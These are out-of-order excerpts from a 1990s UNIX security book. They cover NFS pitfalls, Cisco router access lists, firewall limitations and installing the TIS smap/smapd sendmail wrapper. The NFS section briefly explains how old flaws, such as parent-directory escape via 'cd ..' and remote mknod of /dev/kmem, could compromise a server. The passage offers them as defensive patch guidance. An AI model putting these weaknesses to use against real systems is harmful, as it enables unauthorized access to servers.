the World Wide Web chapter. Wietse Venema reviewed the chapter on wrappers.<br />

Æleen Frisch, author of Essential System Administration (<strong>O'Reilly</strong> & Associates, 1995) kindly allowed<br />

us to excerpt the section on access control lists from her book.<br />

Thanks to the many people from <strong>O'Reilly</strong> & Associates who turned our manuscript into a finished<br />

product. Debby Russell did another command performance in editing this book and coordinating the<br />

review process. Mike Sierra and Norman Walsh provided invaluable assistance in moving <strong>Practical</strong><br />

<strong>UNIX</strong> <strong>Sec</strong>urity 's original troff files into FrameMaker format and in managing an increasingly large and<br />

complex set of Frame and SGML tools. Nicole Gipson Arigo did a wonderful job as production manager<br />

for this job. Clairemarie Fisher O'Leary assisted with the production process and managed the work of<br />

contractors. Kismet McDonough-Chan performed a quality assurance review, and Cory Willing<br />

proofread the manuscript. Nancy Priest created our interior design. Chris Reilley developed the new<br />

figures. Edie Freedman redesigned the cover. And Seth Maislin gave us a wonderfully usable index.<br />

Thanks to Gene's wife Kathy and daughter Elizabeth for tolerating continuing mentions of "The Book"<br />

and for many nights and weekends spent editing. Kathy also helped with the proofreading.<br />

Between the first and second editions of this book, Simson was married to Elisabeth C. Rosenberg.<br />

Special thanks are due to her for understanding the amount of time that this project has taken.<br />



Preface

Comments and Questions

We have tested and verified all of the information in this book to the best of our ability, but you may find<br />

that features have changed, typos have crept in, or that we have made a mistake. Please let us know about<br />

what you find, as well as your suggestions for future editions, by contacting:<br />

<strong>O'Reilly</strong> & Associates, Inc.<br />

101 Morris Street<br />

Sebastopol, CA 95472<br />

1-800-998-9938 (in the US or Canada)<br />

1-707-829-0515 (international/local)<br />

1-707-829-0104 (FAX)<br />

You can also send us messages electronically. See the insert in the book for information about all of<br />

<strong>O'Reilly</strong> & Associates' online services.<br />



Preface

A Note to Computer Crackers

We've tried to write this book in such a way that it can't be used easily as a "how-to" manual for potential<br />

system crackers. Don't buy this book if you are looking for hints on how to break into systems. If you are<br />

a system cracker, consider applying your energy and creativity to solving some of the more pressing<br />

problems facing us all, rather than creating new problems for overworked computer users and<br />

administrators. Breaking into computer systems is not proof of special ability, and breaking into someone<br />

else's machine to demonstrate a security problem is nasty and destructive, even if all you do is "look<br />

around."<br />

The names of systems and accounts in this book are for example purposes only. They are not meant to<br />

represent any particular machine or user. We explicitly state that there is no invitation for people to try to<br />

break into the authors' or publisher's computers or the systems mentioned in this text. Any such attempts<br />

will be prosecuted to the fullest extent of the law, whenever possible. We realize that most of our readers<br />

would never even think of behaving this way, so our apologies to you for having to make this point.<br />



Part I: Computer Security Basics

This part of the book provides a basic introduction to security policy. These chapters are intended to be<br />

accessible to both users and administrators.<br />

● Chapter 1, Introduction, provides a history of the UNIX operating system and an introduction to UNIX security. It also introduces basic terms we use throughout the book.

● Chapter 2, Policies and Guidelines, examines the role of setting good policies to guide protection of your systems. It also describes the tradeoffs that must be made to account for cost, risk, and corresponding benefits.



Part II: User Responsibilities

This part of the book provides a basic introduction to <strong>UNIX</strong> host security. These chapters are intended to<br />

be accessible to both users and system administrators.<br />

● Chapter 3, Users and Passwords, is about UNIX user accounts. It discusses the purpose of passwords, explains what makes good and bad passwords, and describes how the crypt() password encryption system works.

● Chapter 4, Users, Groups, and the Superuser, describes how UNIX groups can be used to control access to files and devices. It also discusses the UNIX superuser and the role that special users play.

● Chapter 5, The UNIX Filesystem, discusses the security provisions of the UNIX filesystem and tells how to restrict access to files and directories to the file's owner, to a group of people, or to everybody on the computer system.

● Chapter 6, Cryptography, discusses the role of encryption and message digests in your security. It includes a discussion of how various popular encryption schemes, including the PGP mail package, work.



Chapter 4: Users, Groups, and the Superuser

4.4 Summary

Every account on your UNIX system should have a unique UID. This UID is used by the system to determine access rights to various files and services. Users should have unique UIDs so their actions can be audited and controlled.

Each account also belongs to one or more groups, represented by GIDs. You can use group memberships to designate access to resources shared by more than one user.

Your computer has a special account called root, which has complete control over the system. Be sure to limit who has access to the root account, and routinely check for bad su attempts. If possible, you should have all of the machines on your network log bad su attempts to a specially appointed secure machine. Each computer on your network should have a different superuser password.



Part III: System Security

This part of the book is directed primarily towards the UNIX system administrator. It describes how to configure UNIX on your computer to minimize the chances of a break-in, as well as to limit the opportunities for a nonprivileged user to gain superuser access.

● Chapter 7, Backups, discusses how and why to make archival backups of your storage. It includes discussions of backup strategies for different types of organizations.

● Chapter 8, Defending Your Accounts, describes ways that a computer cracker might try to initially break into your computer system. By knowing these "doors" and closing them, you increase the security of your system.

● Chapter 9, Integrity Management, discusses how to monitor your filesystem for unauthorized changes. This includes coverage of the use of message digests and read-only disks, and the configuration and use of the Tripwire utility.

● Chapter 10, Auditing and Logging, discusses the logging mechanisms that UNIX provides to help you audit the usage and behavior of your system.

● Chapter 11, Protecting Against Programmed Threats, is about computer viruses, worms, and Trojan horses. This chapter contains detailed tips that you can use to protect yourself from these electronic vermin.

● Chapter 12, Physical Security. What if somebody gets frustrated by your super-secure system and decides to smash your computer with a sledgehammer? This chapter describes physical perils that face your computer and its data and discusses ways of protecting them.

● Chapter 13, Personnel Security, examines concerns about who you employ and how they fit into your overall security scheme.



Part IV: Network and Internet Security

This part of the book is about the ways in which individual UNIX computers communicate with one another and with the outside world, and the ways that these systems can be subverted by attackers to break into your computer system. Because many attacks come from the outside, these chapters are vital reading for anyone whose computer has outside connections.

● Chapter 14, Telephone Security, describes how modems work and provides step-by-step instructions for testing your computer's modems to see if they harbor potential security problems.

● Chapter 15, UUCP, is about the UNIX-to-UNIX copy system, which can use standard phone lines to copy files, transfer electronic mail, and exchange news. This chapter explains how UUCP works and tells you how to make sure that it can't be subverted to damage your system.

● Chapter 16, TCP/IP Networks, provides background on how TCP/IP networking programs work and describes the security problems they pose.

● Chapter 17, TCP/IP Services, discusses the common IP network services found on UNIX systems, coupled with common problems and pitfalls.

● Chapter 18, WWW Security, describes some of the issues involved in running a WWW server without opening your system to security problems. The issues discussed here should also be borne in mind when operating any other kind of network-based information server.

● Chapter 19, RPC, NIS, NIS+, and Kerberos, discusses a variety of network information services. It covers how they work and describes common pitfalls.

● Chapter 20, NFS, describes how Sun Microsystems' Network Filesystem works and its potential security problems.



Chapter 20: NFS

20.5 Some Last Comments

Here are a few final words about NFS.

20.5.1 Well-Known Bugs

NFS depends on NIS or NIS+ on many machines. Both NFS and NIS implementations have had some well-known implementation flaws and bugs in recent years. Not only are these flaws well known, there are a number of hacker toolboxes available that include programs to take advantage of these flaws. Therefore, if you are running NFS, you should be certain that you are up to date on vendor patches and bug fixes. In particular:

● Make sure that your version of the RPC portmapper does not allow proxy requests and that your own system is not in the export list for a partition. Otherwise, a faked packet sent to your RPC system can be made to fool your NFS system into acting as if the packet was valid and came from your own machine.

● Make sure that your NFS either uses Secure RPC, or examines the full 32 bits of the UIDs passed in. Some early versions of NFS only examined the least significant 16 bits of the passed-in UID for some tests, so accesses could be crafted that would not get mapped to nobody, and would function as root accesses.

● Make sure that your version of NFS does not allow remote users to issue mknod commands on partitions they import from your servers. A user creating a new /dev/kmem file on your partition has made a big first step towards a complete compromise of your system.

● Make sure that your NFS does the correct thing when someone does a cd .. in the top level of a directory imported from your server. Some older versions of NFS would return a file handle to the server's real parent directory instead of the parent of the client's mount point. Because NFS doesn't know how you get file handles, and it applies permissions on whole partitions rather than mount points, this process could lead to your server's security being compromised.

In particular, when a server would export a subdirectory as the root partition for a diskless workstation, a user on the workstation could do cd /; cd .. and, instead of getting the root directory again, would have access to the parent directory on the server! Further compounding this scenario, the export of the partition needed to be done with root= access. As a result, clients would have unrestricted access to the server's disks!

● Make sure that your server parses the export option list correctly. Some past and current NFS implementations get accesses mixed up. If you specify access= and rw= on the same export, or access= and root=, the system sometimes forgets the access= specification and exports the partition to every other machine in the world.
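To make these export options concrete, here is a purely illustrative /etc/exports entry in the SunOS-style syntax that the access=, rw=, and root= options above come from. The pathname and client names are invented, and export-file syntax differs from vendor to vendor, so check your own exports(5) manual page rather than copying this literally:

# /etc/exports (SunOS-style syntax; illustrative only)
# Export the home partition read-write to two named clients only.
# No root= option is given, so remote root access is mapped to nobody,
# and the server itself is deliberately not in the client list.
/export/home   -rw=client1:client2,access=client1:client2

Whatever syntax your system uses, the goals are the same: name the clients explicitly, never export to the world, grant root= access only when you absolutely need it, and keep your own server out of its own export lists.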

20.5.2 For Real Security, Don't Use NFS

NFS and other distributed filesystems provide some wonderful functions. They are also a source of continuing headaches. You should consider the question of whether you really need all the flexibility and power of NFS and distributed systems. By reexamining your fundamental assumptions, you may find that you can reconfigure your systems to avoid NFS problems completely, by eliminating NFS.

For instance, one reason that is often given for having NFS is to easily keep software in sync on many machines at once. However, that argument was more valid before the days of high-speed local networks and cheap disks. You might be better served by equipping each workstation in your enterprise with a 2GB or 4GB disk, with a complete copy of all of your applications residing on each machine. You can use a facility such as rdist (see Chapter 9) to make necessary updates. Not only will this configuration give you better security, but it will also provide better fault tolerance: if the server or network goes down, each system has everything necessary to continue operation. This configuration also facilitates system customization.
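For example, a minimal rdist control file (a Distfile) for pushing a local software tree to a few workstations might look something like the sketch below. The host and directory names are invented, and rdist syntax varies a little between versions, so treat this only as an outline and consult your rdist(1) manual page:

# Distfile: copy the local /usr/local tree to three workstations (illustrative only)
HOSTS = ( ws1 ws2 ws3 )
FILES = ( /usr/local/bin /usr/local/lib /usr/local/man )

${FILES} -> ${HOSTS}
        install ;

Running rdist periodically from cron on the master machine then keeps the copies up to date without any filesystem being exported over the network.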

A second argument for network filesystems is that they allow users to access their home directories with greater ease, no matter which machine they use. But while this may make sense in a university student lab, most employees almost always use the same machine, so there is no reason to access multiple machines as if they were equivalent.

Network filesystems are sometimes used to share large databases from multiple points. But network filesystems are a poor choice for this application, because locking the database and synchronizing updates is usually more difficult than sharing a single machine using remote logins. In fact, with the X Window System, opening a window on a central database machine is convenient and often as fast as (or faster than) accessing the data via a network filesystem. Alternatively, you can use a database server, with client programs that are run locally.

The argument is also made that sharing filesystems over the network results in lower cost. In point of fact, such a configuration may be more expensive than the alternatives. For instance, putting high-resolution color X display terminals on each desktop and connecting them with 100-Mbps Ethernet to a multiprocessor server equipped with RAID disks may be more cost-effective, provide better security, give better performance, and use less electricity. The result may be a system that is cheaper to buy, operate, and maintain. The only loss is the cachet of equipping each user with a top-of-the-line workstation on his desktop when all he really needs is access to a keyboard, mouse, and fast display.

Indeed, the only argument for network filesystems may be security. Today most X terminals have no support for encryption.[13] On client/server-based systems that use Kerberos or DCE, you can avoid sending unencrypted passwords and user data over the network. But be careful: you will only get the data confidentiality aspects of this approach if your remote filesystem encrypts all user data; most don't.

[13] We expect this to change in the near future.


Questioning your basic assumptions may simultaneously save you time and money and improve your security.



Part V: Advanced Topics

This part of the book discusses issues that arise when organizational networks are interconnected with the Internet. It also discusses ways of increasing your security through better programming.

● Chapter 21, Firewalls, describes how to set up various types of "firewalls" to protect an internal network from an external attacker.

● Chapter 22, Wrappers and Proxies, describes a few common wrapper and proxying programs that help protect your machine and the programs within it without requiring access to source code.

● Chapter 23, Writing Secure SUID and Network Programs, describes common pitfalls when writing your own software. It gives tips on how to write robust software that will resist attack from malicious users.



Chapter 22: Wrappers and Proxies

Contents:
Why Wrappers?
sendmail (smap/smapd) Wrapper
tcpwrapper
SOCKS
UDP Relayer
Writing Your Own Wrappers

A wrapper is a program that is used to control access to a second program. The wrapper literally wraps around the second program, allowing you to enforce a higher degree of security than the program can enforce on its own.

22.1 Why Wrappers?

Wrappers are a recent invention in UNIX security. These programs were born out of the need to modify operating systems without access to the systems' source code. However, their use has grown, and wrappers have become a rather elegant security tool for a variety of reasons:

● Because the security logic is encapsulated into a single program, wrappers are simple and easy to validate.

● Because the wrapped program remains a separate entity, it can be upgraded without a need to recertify the program that is wrapping it.

● Because wrappers call the wrapped program via the standard exec() system call, a single wrapper can be used to control access to a variety of wrapped programs.

One common use of wrappers is to limit the amount of information reaching a network-capable program. The default design of such programs can be too trusting, and can accept too much information without validation. We will discuss a few common examples later in this chapter.
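To make the mechanics concrete, here is a minimal, purely hypothetical wrapper written as a shell script. The daemon path and log message are invented for illustration; real wrappers, including the ones described in this chapter, perform far more checking before handing over control:

#!/bin/sh
# Hypothetical wrapper for a finger daemon (illustrative only).
# Record the invocation via syslog, then hand control to the real
# daemon with exec, so logging is added without modifying the daemon.
/usr/bin/logger -p daemon.info "in.fingerd wrapper invoked"
exec /usr/libexec/in.fingerd.real "$@"

Because the wrapper ends with an exec, the real daemon inherits the network connection on its standard input and output exactly as if inetd had started it directly.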

This chapter describes three common wrappers:

● A sendmail wrapper (smap/smapd) developed by Trusted Information Systems (TIS)

● A general-purpose wrapper (tcpwrapper) for UDP and TCP daemons, developed by Wietse Venema

● SOCKS, a wrapper that permits outbound TCP/IP connections to tunnel through firewalls, developed by David Koblas and Michelle Koblas

This chapter also briefly describes the UDP Relayer, developed by Tom Fitzgerald. The final section of this chapter describes the situations in which you might wish to write wrappers of your own.



Chapter 21: Firewalls

21.3 Example: Cisco Systems Routers as Chokes

Many organizations use high-performance routers both to connect their companies to the Internet and to perform limited packet filtering. Because routers made by Cisco Systems, Inc., are widely used within the Internet community as this book is being written, we decided that a look at the security configuration for a Cisco router might be helpful.

NOTE: Bear in mind that this description is not a definitive reference for configuring Cisco routers, but is intended to demonstrate highlights of how a router is configured as a choke. Further examples of Cisco configurations may be obtained via FTP from ftp://ftp.cisco.com/pub/acl-examples.

Please also note that we do not intend that our inclusion of vendor-specific information for Cisco routers be taken as an endorsement of their routers over any other vendor's products.

Cisco Systems routers run a complicated operating system called Internetwork Operating System (IOS), which is specially tailored to perform high-speed routing. It is a real-time operating system that is not based on UNIX.

IOS maintains a set of internal configuration tables that are associated with the router, each protocol that the router understands, each network interface, and each physical "line" interface. These configuration tables are consulted by the IOS operating system each time a packet is received for routing.

The IOS internal tables are configured from the console when the router is in configuration mode. The current configuration can be extracted from the router using the write command; this command produces a text file of commands that can be stored in the router's nonvolatile memory or saved using a network TFTP server. The router then interprets these commands when it boots as if they were typed on the router's console.

21.3.1 access-list Command: Creating an Access List

IOS uses the access-list command to define the set of IP addresses and protocols with which a particular router will communicate. The access-list command creates an access list; each access list has a unique number. IOS sets aside specific ranges of access-list numbers for specific purposes.

21.3.1.1 access-list: standard form

The standard form of the access-list command for the IP protocol has the form:

access-list access-list-number {deny|permit} source [source-mask]

Where:

access-list-number
Denotes the number of the access list you are defining. For the standard form of the access-list command, the access-list-number must be a decimal integer from 1 through 99.

deny | permit
Specifies whether IP packets matching this access list should be denied (not transmitted) or permitted (transmitted).


source
Specifies the IP address of the host or network from which this packet is being sent. Source must be in the standard form ii.jj.kk.ll.

source-mask
An optional mask that is applied to the source. As with the source, the source-mask is specified in four-part dotted-decimal notation. A 1 in a position indicates that it should be masked (ignored). Thus, 0.0.0.255 means that only the first three octets of the source address will be considered.

If you specify an access list, IOS will add an implicit rule to deny all packets that do not match the rules that you have provided.

For example, this command would permit all packets from the host 204.17.195.100:

access-list 1 permit 204.17.195.100

This command would deny all packets from the class C network 198.3.4:

access-list 1 deny 198.3.4.0 0.0.0.255

21.3.1.2 access-list: extended form

The access-list command has an extended form which allows you to make distinctions based on the particular IP protocol and service.[8] In the case of the TCP/IP protocol, you can even create restrictions based on the connection's direction - whether it is outgoing or incoming.

[8] In addition to IP, Cisco routers support many other protocols as well, including AppleTalk and IPX, but we won't discuss them here.

The extended version of the access-list command has syntax that is similar to the standard form; the key differences are that the access-list-number must be in the range 100 through 199, and that there are additional parameters:

access-list access-list-number {deny|permit} protocol \
    source source-mask destination destination-mask [established]

Where:

access-list-number
Denotes the number of the access list that you are defining. For the extended form of the access-list command, the access-list-number must be a decimal integer from 100 through 199.

deny | permit
Specifies whether IP packets matching this access list should be denied (not transmitted) or permitted (transmitted).

protocol
Specifies the protocol name or number. Specify ip, tcp, udp, icmp, igmp, gre, igrp, or the IP protocol number (range 0 through 255). Use ip to specify all IP protocols, including TCP, UDP, and ICMP.

source
Specifies the IP address of the host or network from which this packet is being sent; must be in the standard form ii.jj.kk.ll.

source-mask
An optional mask that is applied to the source. As with the source, the source-mask is specified in four-part dotted-decimal notation. A 1 in a position indicates that it should be masked. Thus, 0.0.0.255 means that only the first three octets of the source address will be considered.


destination
Specifies the address of the host or network to which this packet is being sent; must be in the standard form ii.jj.kk.ll.

destination-mask
An optional mask that is applied to the destination. As with the source-mask, the destination-mask is specified in four-part dotted-decimal notation, where a 1 in a position indicates that it should be masked.

operator
This optional argument allows you to specify a particular TCP or UDP port, or even a range of ports. Allowable values are described in Table 21.1.

operand
A number, in decimal, used to refer to a specific TCP or UDP port.

Table 21.1: Cisco Operator/Operand Combinations

Operator  Meaning          Example   Result
eq        equal to         eq 23     Selects the Telnet port.
gt        greater than     gt 1023   Selects all non-privileged ports.
lt        less than        lt 1024   Selects all privileged ports.
neq       not equal to     neq 25    Selects all ports other than the SMTP port.

established
If present, indicates packets for an established connection. This option applies only to the TCP protocol, and selects packets that have the ACK or RST bits set. By blocking packets that do not have either the ACK or RST bits set as they travel into your organization's network, you can block incoming connections while still allowing outgoing connections.

log
If present, causes violations of access lists to be logged via syslog to the specified logging host.
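For example, the following hypothetical rule (reusing the example network 204.17.195.0 from elsewhere in this section) would admit only TCP packets that belong to connections opened from inside that network; because of the implicit deny rule, all other inbound IP traffic to the network would be dropped. As with everything in this section, confirm the exact syntax against your own IOS documentation before using it:

access-list 101 permit tcp 0.0.0.0 255.255.255.255 204.17.195.0 0.0.0.255 established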

21.3.2 show access-lists Command: Seeing the Current Access Lists

You can use the IOS show access-lists command to display all of the current access lists. For example:

router>show access-lists
Standard IP access list 1
    permit 204.17.195.0
    permit 199.232.92.0
Extended IP access list 108
    deny ip 199.232.92.0 0.0.0.255 any
    deny ip 204.17.195.0 0.0.0.255 any
    permit ip any any (1128372 matches)
router>

In this example, there are two IP access lists: access list #1, which is a standard list, and access list #108, which is an extended list. The standard list permits the transmission of any packet that comes from the IP networks 204.17.195 or 199.232.92; the extended list denies any packet coming from these two networks.

The pair of rules in this example can be used to erect a barrier to IP spoofing for an organization that is connected to the Internet. The organization, with two internal IP networks (204.17.195 and 199.232.92), could apply the first access list to its outbound interface, and the extended list to inbound packets from its serial interface. As a result, any incoming packets that claim to be from the organization's internal network would be rejected.
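Using the ip access-group command described later in this section, that assignment might look something like the following sketch; the interface name is illustrative, so substitute whichever interface faces your Internet service provider:

router(config)#interface serial 0
router(config-if)#ip access-group 1 out
router(config-if)#ip access-group 108 in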


Be aware that the show access-lists command is normally not a privileged command; anybody who can log into your router can see all of your access lists. You can make it privileged by using the IOS privilege commands added in IOS Version 10.3.

21.3.3 access-class Command: Protecting Virtual Terminals

After you have created one or more access lists, you can use the access-class command to assign an access list to a particular Cisco virtual-terminal line. You should use the access-class command to configure your router so that it will reject login attempts from any host outside your organization. You may also wish to configure your router so that it rejects all login attempts from inside your organization as well, with the exception of a specially designated administrative machine.

The access-class command has the following syntax:

access-class access-list-number {in|out}

Where:

access-list-number
Specifies the number of an access list. This must be a number between 1 and 199.

in | out
Specifies whether incoming connections or outgoing connections should be blocked.

You can use this command to prevent people from logging directly onto your router (using one of the vty interfaces) unless they are coming from a specially designated network. For example, to configure your router so that it will only accept logins from the class C network 198.3.3, you could use the following sequence of IOS commands:

router#config t
Enter configuration commands, one per line.  End with CNTL/Z.
router(config)#access-list 12 permit 198.3.3.0 0.0.0.255
router(config)#line vty 0 4
router(config-line)#access-class 12 in
router(config-line)#^Z
router#

21.3.4 ip access-group Command: Protecting IP Interfaces

You can also use access lists to specify packets that should be blocked from crossing an IP interface. For example, if you are using the Cisco router as the choke in a conventional choke-and-gate firewall, and you have a serial connection to an Internet service provider, you can specify that the only IP packets transmitted in from the serial interface should be those destined for the gate machine, and that the only IP packets transmitted out from the serial interface should be those that come from your gate.

The command that associates an access list with a particular interface is the access-group command. This is an interface-configuration command, which means that it is typed when the router is in interface-configuration mode.

The access-group command has the following syntax:

ip access-group access-list-number {in | out}

Where:

access-list-number
Specifies the number of an access list. This must be a number between 1 and 199.

in | out


Specifies whether incoming connections or outgoing connections should be blocked.

For example, to configure your serial 0 interface so that it will only send packets to or from a gate computer located at IP address 204.17.100.200, you might configure your router as explained in the following paragraphs.

First, create one access list that selects for packets that have the gate as their source (access list #10) and a second access list that selects for packets that have the gate as their destination (access list #110):

router#config t
Enter configuration commands, one per line.  End with CNTL/Z.
router(config)#access-list 10 permit 204.17.100.200 0.0.0.0
router(config)#access-list 110 permit ip 0.0.0.0 255.255.255.255 204.17.100.200 0.0.0.0

Now, assign these access lists to the serial 0 interface:

router(config)#int serial 0
router(config-if)#ip access-group 10 out
router(config-if)#ip access-group 110 in

Remember to use the IOS write command to save the configuration.

21.3.5 accounting access-violations Command: Using IP Accounting

IOS has an IP accounting feature that can track the number of IP packets that are passed by the router and then rejected. You can use this feature to detect whether somebody is trying to bypass your firewall security. If logging is enabled, you will be told the IP address of the attacker and the protocol being used.

To turn on IP accounting to check for access violations on a specific interface, use the command:

router(config-if)#ip accounting access-violations

Access Control vs. Performance

IOS consults the entire access control list every time a packet is received for routing. As a result, the more complicated your access lists, the slower your router's performance will be.

You can maximize your router's performance, and improve overall security, by making your access lists as simple as possible. You can also improve performance by using route filtering. If you have a complex list of hosts to which you do or do not wish to offer particular services, you can supplement your access lists by using a program on your gate such as tcpwrapper, in addition to implementing them on your choke. This will give you extra protection.



Chapter 21: Firewalls

21.6 Final Comments

We feel ambivalent about firewalls. While they are an interesting technology, they are not a cure-all for network security problems. They also are being used to connect many networks to the Internet that should not necessarily be connected. So before you run out and invest your time and money in a firewall solution, consider these points:

21.6.1 Firewalls Can Be Dangerous

We started the chapter by pointing out that a firewall is not a panacea. We will conclude the chapter by making the point again: firewalls can be a big help in ensuring the security of your network; however, a misconfigured firewall, or a firewall with poor per-host controls, may actually be worse than no firewall at all. With no firewall in place, you will at least be more concerned about host security and monitoring. Unfortunately, at many sites, management may be lulled into believing that their systems are secure after they have paid for the installation of a significant firewall - especially if they are only exposed to the advertising hype of the vendor and consultants.

21.6.2 Firewalls Sometimes Fail

The truth of the matter is that a firewall is only one component of good security. And it is a component that is only effective against external threats. Insider attacks are seldom affected in any way by a firewall. Collusion of an insider and an outsider can circumvent a firewall in short order. And bugs, misconfiguration problems, or equipment failure may all result in a temporary failure of the firewall you have in place. One single user, anywhere "inside" your network, can also unwittingly compromise the entire firewall scheme by connecting a modem to a desktop workstation ... and you will not likely know about the compromise until you are required to clean up the resulting break-in.

Does this case sound unlikely? It isn't. Richard Power of the Computer Security Institute (CSI) surveyed more than 320 Fortune 500 computer sites about their experiences with firewalls. His survey results were released in September of 1995 and revealed that 20% of all sites had experienced a computer security incident. Interestingly, 30% of the Internet security incidents reported by respondents occurred after the installation of a firewall. This incident rate is probably a combined result of misconfiguration, unmonitored back-door connections, and other difficulties.

The CSI study raised a number of questions:

● Perhaps the firewall installation at some sites was faulty, or too permissive.

● Perhaps users internal to the organization found ways to circumvent the firewall by connecting unauthorized modems to the network, thus creating back doors into the network.

● Perhaps the use of firewalls resulted in feelings of overconfidence and a resulting relaxation of other, more traditional controls, thus leading to problems.

● Perhaps the sites using the firewalls are more attractive targets than sites without firewalls, and thus attract more attacks.

● Perhaps, as suggested by many other studies, the majority of incidents continue to be caused by insiders, and these are not stopped by firewalls.

● Perhaps the sites didn't really have a firewall. Over 50% of the companies that claimed to have a "firewall" merely had a screening router.

The key conclusion to be drawn from all of this information is that one or more network firewalls may help your security, but you should plan the rest of your security so that your systems will still be protected in the event that your firewall fails.

21.6.3 Do You Really Need Your Desktop Machines on the Internet?

Let us conclude by reiterating something we said earlier - if you have no network connection, you don't need an external firewall. The question you really should ask before designing a firewall strategy is: what is to be gained from having the connection to the outside, and who is driving the connection? This question revisits the basic issues of policy and risk assessment discussed in Chapter 2, Policies and Guidelines.

At many locations, users are clamoring for Internet access because they want access to Usenet news, entertaining mailing lists, personal email, and WWW on their desktop. However, employees often want these services for purposes that are neither work related nor work enhancing. Indeed, many organizations are now restricting in-house access to those services because employees are wasting too much time on them. Rather than giving your entire corporate network full Internet access, you might consider using one approach for users who need Internet access, and a different approach for users who simply want Internet access. For example:

● Have a small, stand-alone network of machines that are connected to the Internet but not to your internal network. Users who really need Internet access are given accounts on these machines for as long as they continue to need access. A tape drive or serial-line UUCP connection is made available to transfer files between these machines and the internal network without exposing all the internal nodes to IP-based attacks.

● Use a hard-wired UUCP connection to transfer email between your internal network and the Internet. This connection will allow your employees to exchange email with other sites for work-related purposes, but will not expose your network to IP-based attacks.

● Provide remaining users with some form of account access through an ISP outside your company. Then, on their own time, your employees can access the Internet (and possibly some other special services). If you negotiate with the ISP for a large block of accounts for your employees, you may be able to get a very good rate. The rate may be so good, in fact, that you may wish to use company funds to subsidize the accounts, and have low-cost personal Internet access (at home) be another benefit of working at your company. This solution is probably cheaper than a firewall, a major break-in, and the time lost to employees surfing the WWW at work.

Remember that the best firewall is still a large air gap between the network and any of your computers, and that a pair of wire cutters remains the most effective network protection mechanism.[14]

[14] Thanks to Steve Bellovin for this observation.



Chapter 22: Wrappers and Proxies

22.2 sendmail (smap/smapd) Wrapper

The TIS[1] Firewall Toolkit eliminates many of the security problems of sendmail by going to the heart of the problem and breaking the connection between sendmail and the outside world. Instead of having a single SUID program (sendmail) listen for connections on port 25, implement a complex command set, and deliver mail into users' mailboxes, the TIS package uses a pair of programs - one to accept mail from the network, and one to deliver it.

[1] Trusted Information Systems is a company that develops and sells a variety of security products and services. The Firewall Toolkit was largely written by a former employee, Marcus Ranum, and made available to the UNIX community for royalty-free use.

22.2.1 What smap and smapd Do

The sendmail wrapper programs provide the following functions:

smap
This program accepts messages over the network and writes them into a special disk directory for future delivery. Although the smap program runs as root, it executes in a specially designed chroot filesystem, from which it cannot damage the rest of the operating system. The daemon is designed to be invoked from inetd and exits when the mail delivery session is completed. The program logs all SMTP envelope information.

smapd
This program periodically scans the directory where smap delivers mail. When it finds completed messages, it delivers them to the appropriate user's mail file using sendmail or some other program.

The TIS Firewall Toolkit stores configuration and permission information in a single file - usually /usr/local/etc/netperm-table. Naturally, this file should be writable only by the superuser. For added security, set it to mode 600.

22.2.2 Getting smap/smapd

You can obtain the TIS Firewall Toolkit from the computer ftp.tis.com using anonymous FTP.

22.2.3 Installing the TIS smap/smapd sendmail Wrapper

Installation of the complete TIS Firewall Toolkit can be quite complex. Fortunately, the sendmail wrapper programs can be installed without the rest of the kit. The sendmail wrapper can be used to protect any machine that runs sendmail, even if that machine is not a firewall.

To install the sendmail wrapper, follow these steps:


1. Obtain the TIS Firewall Toolkit from ftp.tis.com.

2. Read the documentation and compile the sendmail wrapper.

3. Install the netperm-table configuration file. The default location for the file is /usr/local/etc/netperm-table.

4. Edit the smap and smapd rules to specify the UID under which you want smap to run, where you want the spooled mail kept, where the executable is stored, where your sendmail program is located, and where you want mail to go if it can't be delivered for any reason.[2] In this example, we use uid 5, which corresponds to the user mail in our /etc/passwd file.

[2] If you do set the undelivered mail directory, be sure to check it regularly.

For example:

smap, smapd: userid 5
smap, smapd: directory /var/spool/smap
smapd: executable /usr/local/etc/smapd
smapd: sendmail /usr/lib/sendmail
smapd: baddir /var/spool/smap/bad
smap: timeout 3600

5. Create the smap mail-spool directory (e.g., /var/spool/smap). Set the ownership of this directory to be the user specified in the configuration file:

# chown 5 /var/spool/smap
# chmod 700 /var/spool/smap

Also, create the smap bad mail directory (e.g., /var/spool/smap/bad). Set the ownership of this directory to be the user specified in the configuration file:

# chown 5 /var/spool/smap /var/spool/smap/bad
# chmod 700 /var/spool/smap /var/spool/smap/bad

6. Search your system's start-up files for the line in which sendmail is started with the -bd flag, and then remove the flag. This change will prevent sendmail from listening to port 25 for incoming SMTP connections, but sendmail will continue its job of attempting to deliver all of the messages in the mail queue on a periodic basis. Note that there may not be any such line: your system might be configured to run sendmail from inetd as mail arrives.

For example, if your configuration file has this:

# Remove junk from the outbound mail queue directory and start up
# the sendmail daemon. /usr/spool/mqueue is assumed here even though
# it can be changed in the sendmail configuration file.
#
# Any messages which end up in the queue, rather than being delivered
# or forwarded immediately, will be processed once each hour.
if [ -f /usr/lib/sendmail ]; then
        (cd /usr/spool/mqueue; rm -f nf* lf*)
        /usr/lib/sendmail -bd -q1h 2>/dev/console && \
        (echo -n ' sendmail') >/dev/console
fi

Change it to this:

if [ -f /usr/lib/sendmail ]; then
        (cd /usr/spool/mqueue; rm -f nf* lf*)
        /usr/lib/sendmail -q1h 2>/dev/console && \
        (echo -n ' sendmail') >/dev/console
fi

Alternatively, you can use cron to invoke sendmail on a periodic basis with the -q option, by placing the following line in your crontab file:[3]

[3] Note that different versions of crontab may have slightly different syntax.

30 * * * * /usr/lib/sendmail -q >/dev/null 2>&1

7. Kill the sendmail daemon if it is running.

8. Modify your sendmail.cf file so that the mail user is a trusted user. You need to do this so that sendmail will respect the "From:" address that smapd sets. Trusted users are declared with the "T" command. This example sets root, daemon, uucp, and mail as trusted users:

###################
#  Trusted users  #
###################
# this is equivalent to setting class "t"
# Ft/etc/sendmail.ct
Troot
Tdaemon
Tuucp
Tmail

9. Edit your /etc/inetd.conf file by inserting this line, so that smap is started when connections are attempted on port 25:

smtp stream tcp nowait root /usr/local/etc/smap smap

10. Cause inetd to reread its initialization file by sending it a HUP signal:

# ps aux | grep inetd
root       129  0.0  1.8 1.52M  296K ?  S  0:00 (inetd)
root      1954  0.0  1.3 1.60M  208K p5 S  0:00 grep inetd
# kill -HUP 129
#

11. Test to see if smap is receiving mail by trying to send mail to the root account. You can do this with telnet:[4]

[4] Of course, replace bigco.com with your own computer's hostname.

# telnet localhost smtp
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 BIGCO.COM SMTP/smap Ready.
helo bigco.com
250 (bigco.com) pleased to meet you.
mail From:<root@bigco.com>
250 ... Sender Ok
